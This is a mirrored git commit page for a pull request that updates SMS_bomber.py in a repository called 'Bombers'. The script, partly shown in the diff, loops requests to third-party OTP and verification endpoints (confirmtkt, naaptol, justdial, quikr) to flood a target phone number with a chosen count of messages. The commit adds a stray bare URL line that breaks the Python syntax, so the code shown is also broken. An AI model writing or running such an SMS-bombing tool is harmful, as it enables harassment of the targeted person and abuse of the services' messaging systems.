mirror of
https://github.com/bhattsameer/Bombers.git
synced 2023-08-10 21:12:53 +03:00
Merge pull request #1 from mohmmadyahya010101/patch-1
Update SMS_bomber.py
This commit is contained in:
commit
51dabe0284
@ -32,6 +32,7 @@ def banner():
|
||||
|
||||
#http://www.quikr.com/SignIn?aj=1&for=send_otp&user=
|
||||
|
||||
https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=
|
||||
def send(num, counter, slep):
|
||||
#url = ["https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=","https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile=","https://t.justdial.com/api/india_api_write/10aug2016/sendvcode.php?mobile="]
|
||||
url="https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile="
|
||||
@ -48,4 +49,6 @@ try:
|
||||
banner()
|
||||
send(input("Enter Target Number : "), int(input("Enter Number of Messages : ")), 1)
|
||||
except Exception as e:
|
||||
print("Something is wrong please Re-run this script.")
|
||||
print("Something is wrong please Re-run this script.")
|
||||
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user